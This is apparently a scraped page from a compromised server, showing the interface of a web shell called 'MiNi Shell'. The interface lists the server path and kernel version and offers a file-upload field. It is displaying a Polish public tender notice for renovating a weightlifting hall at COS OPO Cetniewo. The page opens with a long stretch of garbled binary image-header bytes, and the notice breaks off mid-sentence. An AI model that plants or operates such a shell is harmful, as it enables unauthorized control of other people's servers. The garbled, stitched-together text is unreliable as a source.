JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250819/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250819/0038144001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont sali podnoszenia ciężarów na terenie COS OPO Cetniewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Sportu z siedzibą w Warszawie, (00-449), ul. Łazienkowska 6A, Ośrodek Przygotowań Olimpijskich we Władysławowie (84-120) ul. Żeromskiego 52</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 14273335600035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Władysławowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.wladyslawowo@cos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.cos.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont sali podnoszenia ciężarów na terenie COS OPO Cetniewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7f5795dc-3ed2-4709-a947-80edc77fd272</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00381440</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7f5795dc-3ed2-4709-a947-80edc77fd272 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>8. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>9. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>10. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. – nie dotyczy niniejszego postepowania<br/>11. Informacje, oświadczenia lub dokumenty , inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>12. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>13. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest Centralny Ośrodek Sportu, ul. Łazienkowska 6a, 00-449 Warszawa. <br/>	Dane kontaktowe do Inspektora Ochrony Danych: iod@cos.pl, tel. 513790306 ;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na ”Sprawa nr 20/2024 Dostawa i montaż systemowych podłóg sportowych dla COS OPO we Władysławowie” odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">28/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia część 1: Wykonanie otworów w posadzce pod montaż profesjonalnych podestów ciężarowych wraz z wymianą podłogi sportowej oraz wykonaniem robót towarzyszących.<br/>Lokalizacja: Siedziba Zamawiającego, COS OPO Cetniewo ul. Żeromskiego 52,<br/>84-120 Władysławowo.<br/>Wymagania ogólne:<br/>Przedmiotem niniejszego zamówienia są roboty budowlane polegające na wykuciu 12 zagłębień w posadzce pod podesty stanowisk do podnoszenia ciężarów. Wyrównanie oraz zatarcie wewnętrznych powierzchni pionowych (wewnątrz zagłębień). Wyrównanie wylewką samopoziomującą dna zagłębień. Demontaż dwóch ościeżnic oraz wymiana jednej pary drzwi wewnętrznych. Dostawa i montaż nowej, nieużywanej gumowej podłogi sportowej o klasie CFL-S1 i grubości 3 cm w pomieszczeniu siłowni i pomieszczeniach towarzyszących. Dwukrotne malowanie ścian siłowni i pomieszczeń towarzyszących. Demontaż oraz montaż nowych drabinek gimnastycznych dostarczonych przez Zamawiającego. <br/><br/><br/>Wymagania (parametry) szczegółowe w wersji tabelarycznej:<br/>Lp.	Asortyment	J.m.	Ilość	Opis wymagań	Uzasadnienie wymagań<br/>1	2	3	4	5	6<br/>1	Wykonanie zagłębień w posadzce pod podesty stanowisk do podnoszenia ciężarów	szt.	12	Wycięcie i wykucie w niezbrojonej betonowej posadzce zagłębień na głębokość 13 cm. Wymiar docelowy: 2,595 m x 3,095 m	Odpowiednia wielkość wycięcia potrzebna do montażu autoryzowanego pomostu przez PZPC <br/> Wyrównanie oraz zatarcie wyrównujące wewnętrznych powierzchni pionowych (wewnątrz zagłębień). Wymiar docelowy po wyrównaniu: 2,595x3,095 m	Zapewnienie odpowiedniego poziomu niezbędnego do montażu pomostu <br/> Wyrównanie wylewką samopoziomującą dna zagłębień. Głębokość zagłębienia docelowa (po wykonaniu wylewki samopoziomującej) 12 cm, powierzchnia dna jednego zagłębienia 2,595mx3,095=8,032 m2	Zapewnienie odpowiedniego poziomu niezbędnego do montażu pomostu<br/> Wywóz i utylizacja materiału porozbiórkowego	Utrzymanie czystości<br/>2	Demontaż oraz wymiana drzwi wewnętrznych	szt. demontaż 2 szt.<br/>montaż 1 szt.	Demontaż ościeżnicy stalowej o wymiarach 100x200 do pomieszczenia masażu wraz z obróbką podemontażowego bezdrzwiowego otworu	Usunięcie niepotrzebnych drzwi do pomieszczenia<br/> Demontaż drzwi wraz z dostawą i montażem nowych wewnętrznych drzwi o wymiarach 180x200 (drzwi wejściowe odgradzające korytarz z pomieszczeniem siłowni) Drzwi dwuskrzydłowe, półpełne (dół – panel, góra – szklenie), aluminiowe, kolor szary RAL 7016.<br/><br/>Przed zamówieniem drzwi należy wykonać obmiar otworu montażu	Z powodu podniesienia poziomu podłogi przez montaż podłogi sportowej o grubości 3 cm, niezbędne jest wybicie obecnych drzwi, ponieważ by się nie otwierały. Z powodu wysokiej eksploatacji wymiana obecnych drzwi na nowe. <br/>3	Dostawa i montaż sportowej podłogi gumowej	m2	450 m2	Dostawa i montaż sportowej podłogi gumowej o grubości 3 cm i minimalnej gęstości 1050 kg/m3. Wymagany spód w kształcie struktury fali.	Zapewnienie lepszych warunków do treningu dla kadr narodowych. Zapewnienie lepszej ochrony posadzki, lepszej sprężystości przy wykonywaniu ćwiczeń.<br/> Okładzina składająca się z gumowego granulatu SBR z dodatkiem 15% EPDM	Granulat przyjazny dla środowiska, dodatek granulatu SBR wpływa na mniejszą widoczność zabrudzeń oraz wpływa na ogólny lepszy wygląd samej podłogi.<br/> Kolor – czarny z 15% wtrąceniem koloru szarego EPDM ral 7035	Optymalny kolor współgrający z kolorystyką podestów, stojaków, wyposażenia siłowni.<br/> Sposób cięcia – puzzle cięte wodą	Zapewnienie idealnie równych puzzli, co przekłada się zapewnienie spójności podłogi podczas montażu. <br/> Odporność na poślizg ≥90	Wartość zapewniająca odpowiednią porowatość podłogi wpływającą na brak ryzyka poślizgnięcia się podczas treningu.<br/> Ścieralność ≤ 250	Zapewnienie długiej eksploatacji podłogi z zachowaniem jej walorów <br/> Palność – klasa CFL S1	Klasa zapewniająca produkt niezapalny. Klasa głównie stosowana na sportowych obiektach zamkniętych, <br/> Gwarancja min. 12 miesięcy	Gwarancja zapewniająca trwałość podłogi oraz naprawę w razie wystąpienia uszkodzenia.<br/>4	Malowanie ścian	m2	367 m2	Przygotowanie powierzchni -gruntowanie całej powierzchni. Dwukrotne malowanie farbą lateksową klasy 1 w kolorze szarym, ścian siłowni sportowej i pomieszczeń towarzyszących (odcień uzgodniony z Zamawiającym przed wykonaniem malowania)	Odnowienie ścian, zapewnienie czystości oraz większej ochrony przed zabrudzeniami<br/>5	Demontaż i montaż gimnastycznych drabinek ściennych<br/>(NOWYCH DRABINEK NIE NALEŻY WYCENIAĆ – DOSTAWA PO STRONIE ZAMAWIAJĄCEGO)	szt.	14 drabinek<br/>(7 podwójnych)	Demontaż istniejących drabinek gimnastycznych, zamocowanych śrubami M10 do kotew naściennych; punktów mocowań: szt. 42	Demontaż wyeksploatowanych przez lata drabinek gimnastycznych<br/> Wykonanie otworów montażowych w dostarczonych przez Zamawiającego nowych drewnianych drabinkach gimnastycznych, szt. 42	Zapewnienie odpowiedniego montażu nowych drabinek gimnastycznych<br/> Mocowanie nowych drabinek do kotew naściennych śrubami M10; punktów mocowań: 42 szt	Zapewnienie odpowiedniego montażu nowych drabinek gimnastycznych<br/>3	Gwarancja	miesiące	min. 12 miesięcy	Minimum 12 miesięcy na wykonane wszystkie prace budowlane oraz montaż podłogi sportowej, drzwi i drabinek gimnastycznych	Zapewnienie niezawodności, długotrwałej wytrzymałości sprzętu,<br/>4	Autoryzacja	Dokument<br/>potwierdzający	1	Przedstawienie aktualnej autoryzacji PZPC na ofertowany sprzęt: podesty + stojaki.<br/>Autoryzację należy przedstawić z ofertą	Zapewnienie sprzętu najwyższej jakości, zgodnego z wymaganiami PZPC<br/>Opis przedmiotu zamówienia należy czytać łącznie z następującymi załącznikami do SWZ:<br/>Załącznik nr 5 - Przedmiar robót - wykonanie otworów w posadzce pod montaż profesjonalnych podestów ciężarowych wraz z wymianą podłogi sportowej oraz wykonaniem robót towarzyszących – UWAGA nie należy wyceniać nowych drabinek – materiał Zamawiającego<br/>Załącznik nr 5a - Rysunek techniczny – rzut pawilonu sportowego dla ciężarów zawierający wymiary sali, miejsce wykucia otworów pod podesty ciężarowe, wybicia dwóch ościeżnic drzwiowych oraz montażu jednej pary drzwi. Wymiany podłogi sportowej<br/>STWiORB - część 1- załącznik nr 5b do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45432120-1 - Instalowanie nawierzchni podłogowych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia część 2: Zakup dostawa i montaż profesjonalnych pomostów ciężarowych wraz ze stojakami z autoryzacją PZPC 13 kompletów.<br/>Wymagania ogólne:<br/>Wszystkie elementy zestawów nowe, wyprodukowana nie wcześniej niż w roku poprzedzającym ich dostawę. Sprzęt od jednego producenta, nie dopuszcza się zestawów składających się z elementów od różnych producentów.<br/>W ofercie wymagane jest wskazanie nazwy producenta sprzętu. Oferowany sprzęt musi posiadać autoryzację Polskiego Związku Podnoszenia Ciężarów. Wymaga się przedstawienie tego dokumentu dołączonego do oferty. Gwarancja minimum<br/>24 miesiące na wszystkie elementy zestawów do ćwiczeń tj. pomostów wraz ze stojakami.<br/>3. Wymagania (parametry) szczegółowe w wersji tabelarycznej:<br/>Lp.	Asortyment	J.m.	Ilość	Opis wymagań	Uzasadnienie wymagań<br/>1	2	3	4	5	6<br/>1	Zestaw pomostów ciężarowych wraz ze stojakami	kpl.	13	Pomost o wymiarach użytkowych 3 m x 2,5 m zgodny z IWF.	Preferowana wielkość pomostów zapewniająca optymalne warunki do treningu. <br/> Pomost składający się z konstrukcji o grubości 100 mm + dodatkowej gumy jako warstwy amortyzującej o grubości 50 mm. Łączna grubość 150 mm.	Zapewnienie odpowiedniej sprężystości pomostu. <br/> Wymiary zewnętrze pomostu 3080 mm x 2580 mm	Standardowe wymiary zapewniające odpowiednią wielkość pomostu, do profesjonalnego treningu dla kadr narodowych.<br/> Pomost SVR łączony trójkami o grubości nie mniejszej niż 40 mm. 3 warstwowy antydrganiowy, antywibracyjny. Minimalna wartość zapewniająca odpowiednie parametry sprężystości, wytrzymałości pomostu.<br/> Pomost składający się z 3 warstw tworzących jedną całość w profilach 10 x 40 mm malowanych proszkowo w kolorze metalicznym.<br/>- 1 warstwa piankowa antywibracyjna o gęstości od 135 kg/m3 do 165 kg/m3<br/>- 2 warstwa mata gumowa jednolita (wymagana w jednym kawałku)<br/>- 3 warstwa (autoryzacja) mata gumowa o wysokiej gęstości min 1050 kg/m3, wycinana laserem wodnym łączona puzzlem z grzebieniem antywibracyjnym na spodzie maty o wysokości min. 11 mm.	Wielkość profili zapewniająca odpowiednią wytrzymałość pomostu. Malowanie proszkowe zapewnia trwałość warstwy farby na elementach metalowych. Parametry warstw zapewnią odpowiednią sprężystość pomostów. <br/> Pomost posiadający kładkę wykonaną z twardego drewna liściastego w formule sklejki lub klejonki zabezpieczone olejem mineralnym. Warstwa centralna pomostu, zapewniająca odpowiednią przyczepność podczas wykonywanych prób podrzutu i rwania. <br/> Stojaki posiadające belkę stabilizacyjną. Wykonane z profili stalowych malowanych proszkowo w kolorze metalicznym i profili nośnych wykonanych ze stali 